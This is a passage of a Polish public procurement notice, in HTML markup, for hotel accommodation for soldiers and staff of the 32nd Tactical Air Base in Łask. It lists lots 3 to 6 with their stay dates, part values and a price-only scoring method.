najniższą ceną otrzyma maksymalną liczbę punktów – 100. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/><br/>Oferta, która otrzyma najwięcej punktów w kryterium: „cena oferty” (C) zostanie uznana za najkorzystniejszą, a pozostałe oferty będą sklasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.<br/>Jeżeli wybór oferty najkorzystniejszej będzie niemożliwy z uwagi na to, że zostały złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty do złożenia ofert dodatkowych.<br/>Brak określenia w ofercie ceny spowoduje odrzucenie oferty jako niezgodnej z treścią SWZ.<br/><br/>SPOSÓB OBLICZENIA CENY:<br/>Cena oferty uwzględniać powinna wszystkie zobowiązania związane z realizacją zamówienia, musi być skalkulowania w walucie polskiego złotego (PLN) co najmniej cyfrowo, z wyodrębnieniem wartości należnego podatku VAT za każdą część zamówienia odrębnie.<br/>Cena podana w ofercie to cena ryczałtowa i powinna obejmować wszystkie koszty powstałe w wyniku realizacji zamówienia zgodnie z warunkami stawianymi przez Zamawiającego w ramach części zamówienia.<br/>Cena może być tylko jedna, nie dopuszcza się składania ofert wariantowych.<br/>Cena nie ulega zmianie przez okres ważności oferty (termin związania ofertą) oraz okres realizacji zamówienia z zastrzeżeniem dopuszczalnych zmian w umowie.<br/>Cena netto to cena ustalona za jednostkę usługi, której ilość lub liczba jest wyrażona w jednostkach miar – wynagrodzenie za jedną dobę hotelową za jedną osobę (bez kwoty podatku VAT).<br/>Wartość netto to wartość usługi, bez kwoty podatku (tj. iloczyn ceny jednostkowej netto i ilości osobodób hotelowych).<br/>Podatek VAT to kwota podatku od towarów i usług, obliczona według obowiązującej stawki procentowej.<br/>Wartość brutto to całkowita wartość przedmiotu zamówienia - usługi wraz z kwotą podatku VAT (suma wartości netto i wartości podatku VAT), na którą składa się koszt wykonania usługi w części od 1 do 6, zgodnie z dokumentacją zamówienia.<br/>Podstawę oceny i porównania ofert stanowi cena brutto (wartość brutto) wyliczona wpisana w formularzu ofertowym (załącznik nr 1 do SWZ) za daną część zamówienia.<br/>W przypadku rozbieżności kwoty netto oraz kwoty brutto Zamawiający przyjmie, że Wykonawca za realizację zamówienia oferuje wskazaną w formularzu kwotę netto, do której doliczony zostanie należny podatek Vat.<br/>W przypadku rozbieżności w zakresie kwoty w formularzu cenowym oraz formularzu ofertowym Zamawiający przyjmie, że Wykonawca oferuje wykonanie usługi za cenę wskazaną w formularzu cenowym i taką też przyjmie do oceny i porównania ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa polegająca na świadczeniu usług hotelarskich i noclegowych dla żołnierzy i personelu 32 BLT w Łasku, łącznie dla 89 osób, w podziale na części:<br/><br/>Część 3 – nocleg dla 17 osób w pokojach jedno lub wieloosobowych;<br/>dwuosobowym.<br/>2. Zakwaterowanie w ramach 3 części zamówienia odbędzie się w następujących<br/>terminach:<br/>od 02.06.2025 r. – do 05.06.2025 r. (3 doby hotelowe)<br/>od 09.06.2025 r. – do 12.06.2025 r. (3 doby hotelowe)<br/>od 16.06.2025 r. – do 18.06.2025 r. (2 doby hotelowe)<br/>od 23.06.2025 r. – do 26.06.2025 r. (3 doby hotelowe)<br/>od 30.06.2025 r. – do 03.07.2025 r. (3 doby hotelowe)<br/>od 07.07.2025 r. – do 10.07.2025 r. (3 doby hotelowe)<br/>od 14.07.2025 r. – do 18.07.2025 r. (4 doby hotelowe)<br/><br/>3. Wykonawca wg własnych możliwości może zaproponować Zamawiającemu<br/>zakwaterowanie w pokojach wyłącznie jednoosobowych, dwuosobowych,<br/>trzyosobowych lub czteroosobowych.<br/>4. Wykonawca składając ofertę obligatoryjnie winien zaoferować Zamawiającemu dla części 3 zamówienia co najmniej 2 pokoje do pojedynczego zakwaterowania jednej osoby.<br/>5. Wykonawca składając ofertę na poszczególną część zamówienia potwierdza możliwość zakwaterowania wskazanej w w tej części liczby osób odpowiednio: 2, 17 lub 18 osób we wszystkich ww. dobach hotelowych (w zależności od nr części).<br/>6. Wykonawca składając ofertę na więcej niż jedną część zamówienia potwierdza<br/>możliwość zapewnienia jednoczesnego zakwaterowania sumy osób z każdej<br/>deklarowanej części w ww. terminach.<br/>8. Szczegółowy opis przedmiotu zamówienia oraz wymagania jakościowe odnoszące się do głównych elementów zamówienia zawiera załącznik nr 5 do SWZ- Opis przedmiotu zamówienia.<br/>9. Sposób realizacji przedmiotu zamówienia określa również załącznik nr 4 do SWZ –wzór umowy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 46249,89 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55110000-4 - Hotelarskie usługi noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-06-01 do 2025-07-19</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">OCENA OFERT:<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą sumę punktów w oparciu o ustalone kryterium cena 100%.<br/>Kryterium „Cena oferty” (C) będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu ofertowym na podstawie wyliczeń w formularzu cenowym.<br/>Ilość punktów w tym kryterium zostanie obliczona na podstawie wzoru w SWZ.<br/>Zamawiający dokona oceny ofert przyznając punkty w kryterium: cena oferty przyjmując zasadę, że 1%=1 punkt.<br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 100. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/><br/>Oferta, która otrzyma najwięcej punktów w kryterium: „cena oferty” (C) zostanie uznana za najkorzystniejszą, a pozostałe oferty będą sklasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.<br/>Jeżeli wybór oferty najkorzystniejszej będzie niemożliwy z uwagi na to, że zostały złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty do złożenia ofert dodatkowych.<br/>Brak określenia w ofercie ceny spowoduje odrzucenie oferty jako niezgodnej z treścią SWZ.<br/><br/>SPOSÓB OBLICZENIA CENY:<br/>Cena oferty uwzględniać powinna wszystkie zobowiązania związane z realizacją zamówienia, musi być skalkulowania w walucie polskiego złotego (PLN) co najmniej cyfrowo, z wyodrębnieniem wartości należnego podatku VAT za każdą część zamówienia odrębnie.<br/>Cena podana w ofercie to cena ryczałtowa i powinna obejmować wszystkie koszty powstałe w wyniku realizacji zamówienia zgodnie z warunkami stawianymi przez Zamawiającego w ramach części zamówienia.<br/>Cena może być tylko jedna, nie dopuszcza się składania ofert wariantowych.<br/>Cena nie ulega zmianie przez okres ważności oferty (termin związania ofertą) oraz okres realizacji zamówienia z zastrzeżeniem dopuszczalnych zmian w umowie.<br/>Cena netto to cena ustalona za jednostkę usługi, której ilość lub liczba jest wyrażona w jednostkach miar – wynagrodzenie za jedną dobę hotelową za jedną osobę (bez kwoty podatku VAT).<br/>Wartość netto to wartość usługi, bez kwoty podatku (tj. iloczyn ceny jednostkowej netto i ilości osobodób hotelowych).<br/>Podatek VAT to kwota podatku od towarów i usług, obliczona według obowiązującej stawki procentowej.<br/>Wartość brutto to całkowita wartość przedmiotu zamówienia - usługi wraz z kwotą podatku VAT (suma wartości netto i wartości podatku VAT), na którą składa się koszt wykonania usługi w części od 1 do 6, zgodnie z dokumentacją zamówienia.<br/>Podstawę oceny i porównania ofert stanowi cena brutto (wartość brutto) wyliczona wpisana w formularzu ofertowym (załącznik nr 1 do SWZ) za daną część zamówienia.<br/>W przypadku rozbieżności kwoty netto oraz kwoty brutto Zamawiający przyjmie, że Wykonawca za realizację zamówienia oferuje wskazaną w formularzu kwotę netto, do której doliczony zostanie należny podatek Vat.<br/>W przypadku rozbieżności w zakresie kwoty w formularzu cenowym oraz formularzu ofertowym Zamawiający przyjmie, że Wykonawca oferuje wykonanie usługi za cenę wskazaną w formularzu cenowym i taką też przyjmie do oceny i porównania ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa polegająca na świadczeniu usług hotelarskich i noclegowych dla żołnierzy i personelu 32 BLT w Łasku, łącznie dla 89 osób, w podziale na części:<br/>Część 4 – nocleg dla 17 osób w pokojach jedno lub wieloosobowych;<br/>dwuosobowym.<br/>2. Zakwaterowanie w ramach 4 części zamówienia odbędzie się w następujących terminach:<br/>od 02.06.2025 r. – do 05.06.2025 r. (3 doby hotelowe)<br/>od 09.06.2025 r. – do 12.06.2025 r. (3 doby hotelowe)<br/>od 16.06.2025 r. – do 18.06.2025 r. (2 doby hotelowe)<br/>od 23.06.2025 r. – do 26.06.2025 r. (3 doby hotelowe)<br/>od 30.06.2025 r. – do 03.07.2025 r. (3 doby hotelowe)<br/>od 07.07.2025 r. – do 10.07.2025 r. (3 doby hotelowe)<br/>od 14.07.2025 r. – do 18.07.2025 r. (4 doby hotelowe)<br/>3. Zakwaterowanie w ramach 6 części zamówienia odbędzie się w następujących terminach:<br/>od 01.06.2025 r. – do 18.07.2025 r. (47 dób hotelowych).<br/>4. Wykonawca wg własnych możliwości może zaproponować Zamawiającemu<br/>zakwaterowanie w pokojach wyłącznie jednoosobowych, dwuosobowych,<br/>trzyosobowych lub czteroosobowych.<br/>5. Wykonawca składając ofertę obligatoryjnie winien zaoferować Zamawiającemu dla części 4 zamówienia co najmniej 2 pokoje do pojedynczego zakwaterowania jednej osoby.<br/>6. Wykonawca składając ofertę na poszczególną część zamówienia potwierdza możliwość zakwaterowania wskazanej w w tej części liczby osób odpowiednio: 2, 17 lub 18 osób we wszystkich ww. dobach hotelowych (w zależności od nr części).<br/>7. Wykonawca składając ofertę na więcej niż jedną część zamówienia potwierdza<br/>możliwość zapewnienia jednoczesnego zakwaterowania sumy osób z każdej<br/>deklarowanej części w ww. terminach.<br/>8. Szczegółowy opis przedmiotu zamówienia oraz wymagania jakościowe odnoszące się do głównych elementów zamówienia zawiera załącznik nr 5 do SWZ- Opis przedmiotu zamówienia.<br/>9. Sposób realizacji przedmiotu zamówienia określa również załącznik nr 4 do SWZ –wzór umowy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 46249,89 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55110000-4 - Hotelarskie usługi noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-06-01 do 2025-07-19</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">OCENA OFERT:<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą sumę punktów w oparciu o ustalone kryterium cena 100%.<br/>Kryterium „Cena oferty” (C) będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu ofertowym na podstawie wyliczeń w formularzu cenowym.<br/>Ilość punktów w tym kryterium zostanie obliczona na podstawie wzoru w SWZ.<br/>Zamawiający dokona oceny ofert przyznając punkty w kryterium: cena oferty przyjmując zasadę, że 1%=1 punkt.<br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 100. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/><br/>Oferta, która otrzyma najwięcej punktów w kryterium: „cena oferty” (C) zostanie uznana za najkorzystniejszą, a pozostałe oferty będą sklasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.<br/>Jeżeli wybór oferty najkorzystniejszej będzie niemożliwy z uwagi na to, że zostały złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty do złożenia ofert dodatkowych.<br/>Brak określenia w ofercie ceny spowoduje odrzucenie oferty jako niezgodnej z treścią SWZ.<br/><br/>SPOSÓB OBLICZENIA CENY:<br/>Cena oferty uwzględniać powinna wszystkie zobowiązania związane z realizacją zamówienia, musi być skalkulowania w walucie polskiego złotego (PLN) co najmniej cyfrowo, z wyodrębnieniem wartości należnego podatku VAT za każdą część zamówienia odrębnie.<br/>Cena podana w ofercie to cena ryczałtowa i powinna obejmować wszystkie koszty powstałe w wyniku realizacji zamówienia zgodnie z warunkami stawianymi przez Zamawiającego w ramach części zamówienia.<br/>Cena może być tylko jedna, nie dopuszcza się składania ofert wariantowych.<br/>Cena nie ulega zmianie przez okres ważności oferty (termin związania ofertą) oraz okres realizacji zamówienia z zastrzeżeniem dopuszczalnych zmian w umowie.<br/>Cena netto to cena ustalona za jednostkę usługi, której ilość lub liczba jest wyrażona w jednostkach miar – wynagrodzenie za jedną dobę hotelową za jedną osobę (bez kwoty podatku VAT).<br/>Wartość netto to wartość usługi, bez kwoty podatku (tj. iloczyn ceny jednostkowej netto i ilości osobodób hotelowych).<br/>Podatek VAT to kwota podatku od towarów i usług, obliczona według obowiązującej stawki procentowej.<br/>Wartość brutto to całkowita wartość przedmiotu zamówienia - usługi wraz z kwotą podatku VAT (suma wartości netto i wartości podatku VAT), na którą składa się koszt wykonania usługi w części od 1 do 6, zgodnie z dokumentacją zamówienia.<br/>Podstawę oceny i porównania ofert stanowi cena brutto (wartość brutto) wyliczona wpisana w formularzu ofertowym (załącznik nr 1 do SWZ) za daną część zamówienia.<br/>W przypadku rozbieżności kwoty netto oraz kwoty brutto Zamawiający przyjmie, że Wykonawca za realizację zamówienia oferuje wskazaną w formularzu kwotę netto, do której doliczony zostanie należny podatek Vat.<br/>W przypadku rozbieżności w zakresie kwoty w formularzu cenowym oraz formularzu ofertowym Zamawiający przyjmie, że Wykonawca oferuje wykonanie usługi za cenę wskazaną w formularzu cenowym i taką też przyjmie do oceny i porównania ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa polegająca na świadczeniu usług hotelarskich i noclegowych dla żołnierzy i personelu 32 BLT w Łasku, łącznie dla 89 osób, w podziale na części:<br/><br/>Część 5 – nocleg dla 17 osób w pokojach jedno lub wieloosobowych;<br/><br/>2. Zakwaterowanie w ramach 5 części zamówienia odbędzie się w następujących terminach:<br/>od 02.06.2025 r. – do 05.06.2025 r. (3 doby hotelowe)<br/>od 09.06.2025 r. – do 12.06.2025 r. (3 doby hotelowe)<br/>od 16.06.2025 r. – do 18.06.2025 r. (2 doby hotelowe)<br/>od 23.06.2025 r. – do 26.06.2025 r. (3 doby hotelowe)<br/>od 30.06.2025 r. – do 03.07.2025 r. (3 doby hotelowe)<br/>od 07.07.2025 r. – do 10.07.2025 r. (3 doby hotelowe)<br/>od 14.07.2025 r. – do 18.07.2025 r. (4 doby hotelowe)<br/><br/>3. Wykonawca wg własnych możliwości może zaproponować Zamawiającemu<br/>zakwaterowanie w pokojach wyłącznie jednoosobowych, dwuosobowych,<br/>trzyosobowych lub czteroosobowych.<br/>4. Wykonawca składając ofertę obligatoryjnie winien zaoferować Zamawiającemu dla części 5 zamówienia co najmniej 2 pokoje do pojedynczego zakwaterowania jednej osoby.<br/>5. Wykonawca składając ofertę na poszczególną część zamówienia potwierdza możliwość zakwaterowania wskazanej w w tej części liczby osób odpowiednio: 2, 17 lub 18 osób we wszystkich ww. dobach hotelowych (w zależności od nr części).<br/>6. Wykonawca składając ofertę na więcej niż jedną część zamówienia potwierdza<br/>możliwość zapewnienia jednoczesnego zakwaterowania sumy osób z każdej<br/>deklarowanej części w ww. terminach.<br/>7. Szczegółowy opis przedmiotu zamówienia oraz wymagania jakościowe odnoszące się do głównych elementów zamówienia zawiera załącznik nr 5 do SWZ- Opis przedmiotu zamówienia.<br/>8. Sposób realizacji przedmiotu zamówienia określa również załącznik nr 4 do SWZ –wzór umowy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 46249,89 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55110000-4 - Hotelarskie usługi noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-06-01 do 2025-07-19</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">OCENA OFERT:<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą sumę punktów w oparciu o ustalone kryterium cena 100%.<br/>Kryterium „Cena oferty” (C) będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu ofertowym na podstawie wyliczeń w formularzu cenowym.<br/>Ilość punktów w tym kryterium zostanie obliczona na podstawie wzoru w SWZ.<br/>Zamawiający dokona oceny ofert przyznając punkty w kryterium: cena oferty przyjmując zasadę, że 1%=1 punkt.<br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 100. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/><br/>Oferta, która otrzyma najwięcej punktów w kryterium: „cena oferty” (C) zostanie uznana za najkorzystniejszą, a pozostałe oferty będą sklasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.<br/>Jeżeli wybór oferty najkorzystniejszej będzie niemożliwy z uwagi na to, że zostały złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty do złożenia ofert dodatkowych.<br/>Brak określenia w ofercie ceny spowoduje odrzucenie oferty jako niezgodnej z treścią SWZ.<br/><br/>SPOSÓB OBLICZENIA CENY:<br/>Cena oferty uwzględniać powinna wszystkie zobowiązania związane z realizacją zamówienia, musi być skalkulowania w walucie polskiego złotego (PLN) co najmniej cyfrowo, z wyodrębnieniem wartości należnego podatku VAT za każdą część zamówienia odrębnie.<br/>Cena podana w ofercie to cena ryczałtowa i powinna obejmować wszystkie koszty powstałe w wyniku realizacji zamówienia zgodnie z warunkami stawianymi przez Zamawiającego w ramach części zamówienia.<br/>Cena może być tylko jedna, nie dopuszcza się składania ofert wariantowych.<br/>Cena nie ulega zmianie przez okres ważności oferty (termin związania ofertą) oraz okres realizacji zamówienia z zastrzeżeniem dopuszczalnych zmian w umowie.<br/>Cena netto to cena ustalona za jednostkę usługi, której ilość lub liczba jest wyrażona w jednostkach miar – wynagrodzenie za jedną dobę hotelową za jedną osobę (bez kwoty podatku VAT).<br/>Wartość netto to wartość usługi, bez kwoty podatku (tj. iloczyn ceny jednostkowej netto i ilości osobodób hotelowych).<br/>Podatek VAT to kwota podatku od towarów i usług, obliczona według obowiązującej stawki procentowej.<br/>Wartość brutto to całkowita wartość przedmiotu zamówienia - usługi wraz z kwotą podatku VAT (suma wartości netto i wartości podatku VAT), na którą składa się koszt wykonania usługi w części od 1 do 6, zgodnie z dokumentacją zamówienia.<br/>Podstawę oceny i porównania ofert stanowi cena brutto (wartość brutto) wyliczona wpisana w formularzu ofertowym (załącznik nr 1 do SWZ) za daną część zamówienia.<br/>W przypadku rozbieżności kwoty netto oraz kwoty brutto Zamawiający przyjmie, że Wykonawca za realizację zamówienia oferuje wskazaną w formularzu kwotę netto, do której doliczony zostanie należny podatek Vat.<br/>W przypadku rozbieżności w zakresie kwoty w formularzu cenowym oraz formularzu ofertowym Zamawiający przyjmie, że Wykonawca oferuje wykonanie usługi za cenę wskazaną w formularzu cenowym i taką też przyjmie do oceny i porównania ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa polegająca na świadczeniu usług hotelarskich i noclegowych dla żołnierzy i personelu 32 BLT w Łasku, łącznie dla 89 osób, w podziale na części:<br/>Część 6 – nocleg dla 2 osób w pokojach jednoosobowych lub w pokoju dwuosobowym.<br/>2. Zakwaterowanie w ramach 6 części zamówienia odbędzie się w następujących terminach:<br/>od 01.06.2025 r. – do 18.07.2025 r. (47 dób hotelowych).<br/>3. Wykonawca wg własnych możliwości może zaproponować Zamawiającemu<br/>zakwaterowanie w pokojach wyłącznie jednoosobowych, dwuosobowych,<br/>trzyosobowych lub czteroosobowych.<br/>4. Wykonawca składając ofertę na poszczególną część zamówienia potwierdza możliwość zakwaterowania wskazanej w w tej części liczby osób odpowiednio: 2, 17 lub 18 osób we wszystkich ww. dobach hotelowych (w zależności od nr części).<br/>5. Wykonawca składając ofertę na więcej niż jedną część zamówienia potwierdza<br/>możliwość zapewnienia jednoczesnego zakwaterowania sumy osób z każdej<br/>deklarowanej części w ww. terminach.<br/>6. Szczegółowy opis przedmiotu zamówienia oraz wymagania jakościowe odnoszące się do głównych elementów zamówienia zawiera załącznik nr 5 do SWZ- Opis przedmiotu zamówienia.<br/>7. Sposób realizacji przedmiotu zamówienia określa również załącznik nr 4 do SWZ –wzór umowy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 12177,84 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55110000-4 - Hotelarskie usługi noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-06-01 do 2025-07-19</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">OCENA OFERT:<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą sumę punktów w oparciu o ustalone kryterium cena 100%.<br/>Kryterium „Cena oferty” (C) będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu ofertowym na podstawie wyliczeń w formularzu cenowym.<br/>Ilość punktów w tym kryterium zostanie obliczona na podstawie wzoru w SWZ.<br/>Zamawiający dokona oceny ofert przyznając punkty w kryterium: cena oferty przyjmując zasadę, że 1%=1 punkt.<br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 100. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/><br/>Oferta, która otrzyma najwięcej punktów w kryterium: „cena oferty” (C) zostanie uznana za najkorzystniejszą, a pozostałe oferty będą sklasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.<br/>Jeżeli wybór oferty najkorzystniejszej będzie niemożliwy z uwagi na to, że zostały złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty do złożenia ofert dodatkowych.<br/>Brak określenia w ofercie ceny spowoduje odrzucenie oferty jako niezgodnej z treścią SWZ.<br/><br/>SPOSÓB OBLICZENIA CENY:<br/>Cena oferty uwzględniać powinna wszystkie zobowiązania związane z realizacją zamówienia, musi być skalkulowania w walucie polskiego złotego (PLN) co najmniej cyfrowo, z wyodrębnieniem wartości należnego podatku VAT za każdą część zamówienia odrębnie.<br/>Cena podana w ofercie to cena ryczałtowa i powinna obejmować wszystkie koszty powstałe w wyniku realizacji zamówienia zgodnie z warunkami stawianymi przez Zamawiającego w ramach części zamówienia.<br/>Cena może być tylko jedna, nie dopuszcza się składania ofert wariantowych.<br/>Cena nie ulega zmianie przez okres ważności oferty (termin związania ofertą) oraz okres realizacji zamówienia z zastrzeżeniem dopuszczalnych zmian w umowie.<br/>Cena netto to cena ustalona za jednostkę usługi, której ilość lub liczba jest wyrażona w jednostkach miar – wynagrodzenie za jedną dobę hotelową za jedną osobę (bez kwoty podatku VAT).<br/>Wartość netto to wartość usługi, bez kwoty podatku (tj. iloczyn ceny jednostkowej netto i ilości osobodób hotelowych).<br/>Podatek VAT to kwota podatku od towarów i usług, obliczona według obowiązującej stawki procentowej.<br/>Wartość brutto to całkowita wartość przedmiotu zamówienia - usługi wraz z kwotą podatku VAT (suma wartości netto i wartości podatku VAT), na którą składa się koszt wykonania usługi w części od 1 do 6, zgodnie z dokumentacją zamówienia.<br/>Podstawę oceny i porównania ofert stanowi cena brutto (wartość brutto) wyliczona wpisana w formularzu ofertowym (załącznik nr 1 do SWZ) za daną część zamówienia.<br/>W przypadku rozbieżności kwoty netto oraz kwoty brutto Zamawiający przyjmie, że Wykonawca za realizację zamówienia oferuje wskazaną w formularzu kwotę netto, do której doliczony zostanie należny podatek Vat.<br/>W przypadku rozbieżności w zakresie kwoty w formularzu cenowym oraz formularzu ofertowym Zamawiający przyjmie, że Wykonawca oferuje wykonanie usługi za cenę wskazaną w formularzu cenowym i taką też przyjmie do oceny i porównania ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie 